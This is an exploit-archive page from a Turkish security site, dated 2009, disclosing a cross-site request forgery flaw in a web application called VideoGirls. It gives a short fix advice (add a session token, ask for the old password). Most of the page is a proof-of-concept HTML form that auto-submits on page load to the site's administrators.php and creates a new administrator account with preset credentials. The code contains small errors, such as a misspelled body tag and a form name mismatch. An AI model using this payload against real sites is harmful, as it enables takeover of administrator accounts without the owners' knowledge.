VideoGirls ~ XSRF | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > VideoGirls ~ XSRF

Madde
	Author : Bug Researchers/BizaRRo
	Date : 03.02.2009 01:03:50
	# VideoGirls ~ XSRF [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : VideoGirls # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin pass change edilebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : Bug Researchers/BizaRRo ############################################################ < ------------------- header data end of ------------------- > < -- bug code start -- > <b0dy onLoad=Submit();> <script>function Submit[]{document.BizaRRo.submit();}</script> <form name=’form1’ method=’post’ action=’http://www.site.com/webmaster/administrators.php’> <input name=’username_new’ type=text value=’addadd’ size=16 maxlength=32> <input name=’password_new’ type=text value=’addadd’ size=16 maxlength=32> <input name=’email_new’ type=text value=’add@add.com’ size=32 maxlength=64> <input name=’name_new’ type=text value=’add’ size=32 maxlength=64> <input type=’submit’ name=’Submit’ value=’Save’ /> < -- bug code end of -- >